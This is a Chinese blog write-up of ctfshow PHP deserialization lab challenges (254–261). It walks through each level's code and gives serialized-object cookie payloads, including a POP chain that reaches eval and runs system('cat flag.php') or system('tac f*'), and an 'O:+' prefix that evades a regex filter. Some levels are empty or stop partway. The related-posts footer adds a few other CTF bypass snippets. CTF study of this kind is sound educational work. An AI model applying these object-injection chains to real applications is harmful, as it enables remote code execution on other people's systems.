ctfshow web入门 反序列化

已于 2024-03-25 20:27:47 修改
阅读量686 收藏 21
点赞数 23
文章标签: 前端
于 2024-03-24 00:29:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79442654/article/details/136962313
版权
文章讲述了在PHP代码中,通过分析ctfShowUser类的登录逻辑和序列化操作,发现的漏洞,如何通过构造特定payload实现VIP权限验证绕过,以及后续的代码修改和安全问题。
摘要由CSDN通过智能技术生成

254

分析代码:

如果用户名和密码参数都存在,脚本会创建一个 ctfShowUser 类的实例 $user

接着,调用 $user->login($username, $password) 方法尝试登录。如果登录成功(即用户名和密码与类中的默认值匹配),并且用户被标记为VIP($isVip 为 true),则调用 $user->vipOneKeyGetFlag() 方法输出 $flag 的值。

如果登录失败或用户不是VIP,脚本将输出 "no vip, no flag"。

要让程序返回true

需要确保通过GET请求传递的用户名和密码与 ctfShowUser 类中定义的默认用户名和密码相匹配。默认的用户名和密码都是 'xxxxxx'。

payload:

?username=xxxxxx&password=xxxxxx

255

第一个 if 语句检查是否通过GET请求设置了用户名和密码。

第二个 if 语句检查通过反序列化cookie中的用户对象调用 login 方法后返回的结果。

构造代码:

<?php
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
   } 
$a= new ctfShowUser();
$a->isVip = true;
echo urlencode(serialize($a));

?>

序列化得到:

O:11:"ctfShowUser":1:{s:5:"isVip";b:1;}

将代码进行url编码

O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

更改cookie为:

user=O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

payload和254相同

?username=xxxxxx&password=xxxxxx

 

256

发现要求username和passaword的值不完全相等

if($this->username!==$this->password)

步骤同上题,构造:

<?php
//highlight_file(__FILE__);
 
 
class ctfShowUser{
    public $username='xxxxxx';
    public $password='a';
    public $isVip=false;
 
    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    
}
 
$a= new ctfShowUser();
$a->isVip = true;
echo urlencode(serialize($a));

 

user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A1%3A%22a%22%3Bs%3A5%3A%22isVip%22%3Bs%3A4%3A%22ture%22%3B%7D
?username=xxxxxx&password=a

257

ctfShowUser

这个类有几个私有属性:$username、$password、$isVip 和 $class。

__construct 方法尝试创建一个 info 类的实例并赋值给 $class
login 方法检查传入的用户名和密码是否与类的私有属性 $username 和 $password 相匹配。
__destruct 方法在对象销毁时调用,尝试调用 $class 对象的 getInfo 方法。
info
存在一个私有属性 $user 和一个公共方法 getInfo,用于返回 $user 的值。
backDoor
存在一个私有属性 $code 和一个公共方法 getInfo。getInfo 方法使用 eval 执行 $code 属性的内容。
登录逻辑
代码从 $_GET 获取用户名和密码,并检查它们是否已设置。
如果设置了,代码尝试从 $_COOKIE['user'] 反序列化一个对象,并调用其 login 方法。

ctfShowUser对象生成时会创建一个info的对象,结束时会调用info的getInfo

构造:

<?php
class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';
 
    public function __construct(){
        $this->class=new backDoor();
    }
}
 
 
class backDoor{
    private $code="system('cat flag.php');";
}
$a=new ctfShowUser();
echo urlencode(serialize($a));

payload

?username=xxxxxx&?password=xxxxxx

cookie

user=O%3A11%3A%22ctfShowUser%22%3A4%3A%7Bs%3A21%3A%22%00ctfShowUser%00username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A21%3A%22%00ctfShowUser%00password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A18%3A%22%00ctfShowUser%00isVip%22%3Bb%3A0%3Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A23%3A%22system%28%27cat+flag.php%27%29%3B%22%3B%7D%7D

258

添加了正则匹配

使用正则表达式来检查序列化字符串是否以 o:c: 开头

用0:+数字即可绕过

构造代码:

<?php
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
    public $class = 'backDoor';
 
    public function __construct(){
        $this->class=new backDoor();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }
}
class info{
    public $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}
 
class backDoor{
    public $code="system('tac f*');";
    public function getInfo(){
        eval($this->code);
    }
}
echo serialize(new ctfShowUser);
?>

修改一下:

O:+11:"ctfShowUser":4:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";s:5:"isVip";b:0;s:5:"class";O:+8:"backDoor":1:{s:4:"code";s:17:"system('tac f*');";}}
url编码

O%3A%2B11%3A%22ctfShowUser%22%3A4%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A0%3Bs%3A5%3A%22class%22%3BO%3A%2B8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A17%3A%22system('tac%20f*')%3B%22%3B%7D%7D

259

260

构造代码:

<?php
class ctfshow{
    public $a='ctfshow_i_love_36D';
}
echo serialize(new ctfshow());
?>

运行结果:

O:7:"ctfshow":1:{s:1:"a";s:18:"ctfshow_i_love_36D";}

261

highlight_file(__FILE__);
 
class ctfshowvip{
    public $username;
    public $password;
    public $code;
 
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function __wakeup(){
        if($this->username!='' || $this->password!=''){
            die('error');
        }
    }
    public function __invoke(){
        eval($this->code);
    }
 
    public function __sleep(){
        $this->username='';
        $this->password='';
    }
    public function __unserialize($data){
        $this->username=$data['username'];
        $this->password=$data['password'];
        $this->code = $this->username.$this->password;
    }
    public function __destruct(){
        if($this->code==0x36d){
            file_put_contents($this->username, $this->password);
        }
    }
}
 
unserialize($_GET['vip']);
期期颗颗
关注
CTFSHOW WEB入门反序列化
Npceer-一位网安初学者的博客
03-01 1185
最近特别懒 等开学在高强度更新其他几篇 不会写太细 反序列化入门文章找Y4爷爷 反序列化web254web255 web254 直接传 username=xxxxxx&password=xxxxxx web255 首先和254一样 传username和password 然后是需要cookie验证VIP身份 抓包构造 注:需要对分号进行url编码 引号好像不用 我当时瞎搞的 ...
【CTFSHOW】web入门反序列化
7ruth0hn的博客
07-25 3497
web254 include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ if($this
ctfshow
PUTAOAO的博客
08-12 220
crypto2_月自圆 已知m长为71 加密后长度为142 flag在m中第53位置则在密文中105的位置刚好是salt的位置 可以爆破salt和a f ⇒ 1c l ⇒ 29 a ⇒ 56 g ⇒ 66 from itertools import * from random import * from string import * def encrypt(m, a, si): c="" for i in range(len(m)): c+=hex(((ord(m[i])) * a + ord(
[CTF夺旗赛] CTFshow Web1-12 详细过程保姆级教程~
最新发布
Da1NtY的博客
09-09 2388
​ CTFShow通常是指网络安全领域中的“Capture The Flag”(夺旗赛)展示工具或平台。这是一种用于分享、学习和展示信息安全竞赛中获取的信息、漏洞利用技巧以及解题思路的在线社区或软件。参与者会在比赛中收集“flag”,通常是隐藏在网络环境中的数据或密码形式,然后通过分析、破解等手段找到并提交。CTFShow可以帮助人们了解最新的安全技术和挑战,同时也促进了安全知识和技术的交流。
ctf.show
giaogiao123的博客
02-15 279
进入页面首先看到一个题目看hint ?cmd 有了源码 看大佬的笔记这是一个php短标签,正则匹配 考虑绕过 ?cmd=?><?=`/???/?p /???????? p.p`;?> 然后出现文件下载,咱也不知道为撒,反正师傅都是这么写的,让我学明白了在更。 ...
ctfshow Nodejs
weixin_63231007的博客
03-08 751
承接上文nodejs原型链漏洞刷题练习
ctfshow(刷题经历)
qq_62046696的博客
06-26 1685
1、打开以后看见filename=后面感觉是一个base64编码,接着解码一下,发现等于keys.txt,通常的源文件应该是index.php2、对index.php进行base64编码并作为新的filename的参数3、查看源文件,其里line变量起到控制行数的作用: http://114.67.246.176:13972/index.php?line=1&filename=aW5kZXgucGhw发现爆出了第一行隐含的代码,4、编写python脚本,查看全部源码 这样代码就出来了下图:5、分析PH
[ctfshow]web入门——反序列化web261+web264-web267)
ShenZ的博客
03-02 6305
[ctfshow]web入门——反序列化 反序列化 unserialization [ctfshow]web入门——反序列化 web261 web264 str_replace字符串覆盖逃逸 web265 web266 web267 yii系列 反序列化 unserialization[ctfshow]web入门——反序列化
CTFshow 反序列化 web257
Kradress的博客
12-19 1911
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 20:33:07 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight
CTFshow 反序列化 web270
Kradress的博客
02-11 232
目录题解总结 题解 exp <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2021-05-03 21:55:29 # @Last Modified by: h1xa # @Last Modified time: 2021-05-04 01:25:28 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ namespace yii\rest { clas
CTFshow web1
羽的博客
02-26 6137
题目地址:https://ctf.show 扫描后台拿到源码(www.zip)。打开login.php能禁的基本都禁干净了,登录页面貌似没有注入的可能。reg.php也是如此,所以注册页面也没可能了。剩下最后一个就是显示信息的页面了。这里可以看到在数据库中是把所有的字段(包括密码)都给查出来了,但是没有显示密码的地方。 我们可以利用?order=pwd来判断注册的密码与flag用户密码的大小(...
CTF show WEB14
羽的博客
02-18 2817
题目地址:https://ctf.show 对于这个题第一个坑要过的话必须得了解php的switch case语句。 在这里举个例子: $number=1; switch ($number) { case "1": echo "one"; case "2": echo "two"; case "3" echo "three"...
CTFshow DJBCTF MISC(大吉杯) WP
七月的博客
01-24 3489
只做了misc的菜鸡,来写写misc部分的writeup,狸神的FM到最后也看不懂,太难了呜呜呜。 十八般兵器 hint1:JPHS hint2:用Notepad++打开试试? hint3:前十种兵器对应10进制,后八种对应8进制 根据hint1,先利用JPHS将18张图片均解密一下,密码为空,每张图片解密后的数据末尾都有一段数字,这幅图是删掉了部分空格,实际需要往下拉。 根据题目的武器顺序,前十张图片的数字组合起来十进制转十六进制。后八张图片的数字组合起来八进制转十六进制,asc转码一下得到flag
CTF show WEB5
羽的博客
02-15 2826
考察md5绕过,要求v1为为字母,v2为数字,并且v1与v2的md5值相同。 md5漏洞介绍: PHP在处理哈希字符串时,它把每一个以“0E”开头的哈希值都解释为0 所以只要v1与v2的md5值以0E开头即可。 v1=QNKCDZO&v2=240610708 这里附上常见的0E开头的MD5 0e开头的md5和原值: QNKCDZO 0e830400451993494058024219903...
ctfshow(卷王杯)
qq_62046696的博客
09-24 1572
首先我们的前提是if(isset($_POST['a']) && isset($_POST['b']) && isset($_POST['c']))} 这里的name就是上面的string传进来的,但是 $var = $this->$name;array_walk函数的作用就是遍历自定义函数,其中$fn的值为成员的值,prev为成员变量的名字。这是个等于号,相当于赋值,而对于数组无法赋值的情况就是当键溢出就行,可以看到上一句有。如果是数组的话,第一个是类,第二个是方法,第三个是属性。
CTF show WEB6
羽的博客
02-15 3914
1.尝试万能密码 username=admin’ or 1=1#&password=1 显示sql inject error,发现有字符被过滤。 逐个字符输入后发现过滤了空格,一般空格被过滤有如下替换方法 /**/ () 回车(url编码中的%0a) `(tap键上面的按钮) tap 两个空格 这里选择/**/ username=admin’/**/or/**/1=1#&passw...
ctfshow(misc入门)
Dug123456_的博客
04-23 2300
ctf中有一些打开是乱码文件 更改后缀名之后 才能找到我们想要的信息第一种方法:在kali liunx里面使用file命令第二种方法使用010或者是winhex打开文件 查看文件头使用场景:windows下通过文件头信息判断文件类型PNG1)文件格式•头识标,89 50 4E 47 0D 0A 1A 0A•宽度位0x10-0x13,不可随意更改,需根据CRC值修改•高度位0x14-0x17,可随便改。
ctf.show入门
jinianhuo的博客
01-23 139
ctf.show入门Web题目入门1.Web签到题目新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Web题目入门 1.Web签到题目 生成实例,跳转到网页,按F12查看源代码,如下图所示。 盲猜可能是某种加密文字,根据
ctfshow反序列化
09-09
引用中的代码展示了一个类`ctfshow`,其中包含了一个`__destruct`方法,该方法...综上所述,ctfshow的反序列化攻击可以通过构造恶意的序列化payload来利用`__destruct`方法或弱比较漏洞来执行任意代码或获取敏感信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值